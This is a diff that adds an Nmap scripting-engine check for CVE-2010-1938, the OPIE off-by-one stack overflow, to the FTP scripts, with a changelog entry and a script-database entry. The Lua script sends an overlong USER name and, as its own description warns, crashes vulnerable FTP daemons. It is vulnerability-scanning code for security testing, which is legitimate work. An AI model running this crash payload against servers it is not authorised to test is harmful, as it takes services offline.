diff --git a/CHANGELOG b/CHANGELOG index ee104d2c4..3ad7a2f48 100644 --- a/CHANGELOG +++ b/CHANGELOG @@ -1,5 +1,11 @@ # Nmap Changelog ($Id$); -*-text-*- +o [NSE] Added ftp-libopie.nse by Gutek. This script checks for an + off-by-one stack overflow vulnerability in libopie by giving the FTP + service an overlong name. See + http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc for + details. + o Fixed name resolution in environments where gethostbyname can return IPv6 (or other non-IPv4 addresses). In such an environment, Nmap would wrongly use the first four bytes of the IPv6 address as an diff --git a/scripts/ftp-libopie.nse b/scripts/ftp-libopie.nse new file mode 100644 index 000000000..da1ba405e --- /dev/null +++ b/scripts/ftp-libopie.nse @@ -0,0 +1,62 @@ +description = [[ +Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow). +Vulnerability discovered by Maksymilian Arciemowicz and Adam 'pi3' Zabrocki. +See also http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc. +Be advised that, if launched against a vulnerable host, this script will crash the FTPd. +]] + +--- +-- @output +-- PORT STATE SERVICE +-- 21/tcp open ftp +-- | ftp-libopie: Warning: Looks like the service has crashed! +-- | Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow) +-- |_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc + + +author = "Ange Gutek" +license = "Same as Nmap--See http://nmap.org/book/man-legal.html" +categories = {"vuln","intrusive"} + +require "shortport" + +portrule = shortport.port_or_service(21, "ftp") + +action = function(host, port) + local socket = nmap.new_socket() + local result + -- If we use more that 31 chars for username, ftpd will crash (quoted from the advisory). + local user_account = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + local status = true + + local err_catch = function() + socket:close() + end + + local try = nmap.new_try(err_catch) + + socket:set_timeout(10000) + try(socket:connect(host.ip, port.number, port.protocol)) + + -- First, try a safe User so that we are sure that everything is ok + local payload = "USER opie\r\n" + try(socket:send(payload)) + + status, result = socket:receive_lines(1); + if status and not (string.match(result,"^421")) then + + -- Second, try the vulnerable user account + local payload = "USER " .. user_account .. "\r\n" + try(socket:send(payload)) + + status, result = socket:receive_lines(1); + if status then + return + else + -- if the server does not answer anymore we may have reached a stack overflow condition + return "Warning: Looks like the service has crashed!\nLikely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)\nSee http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc" + end + else + return + end +end diff --git a/scripts/script.db b/scripts/script.db index dfd891729..12f5e3c8e 100644 --- a/scripts/script.db +++ b/scripts/script.db @@ -30,6 +30,7 @@ Entry { filename = "finger.nse", categories = { "default", "discovery", "safe", Entry { filename = "ftp-anon.nse", categories = { "auth", "default", "safe", } } Entry { filename = "ftp-bounce.nse", categories = { "default", "intrusive", } } Entry { filename = "ftp-brute.nse", categories = { "auth", "intrusive", } } +Entry { filename = "ftp-libopie.nse", categories = { "intrusive", "vuln", } } Entry { filename = "html-title.nse", categories = { "default", "discovery", "safe", } } Entry { filename = "http-auth.nse", categories = { "auth", "default", "intrusive", } } Entry { filename = "http-date.nse", categories = { "discovery", "safe", } }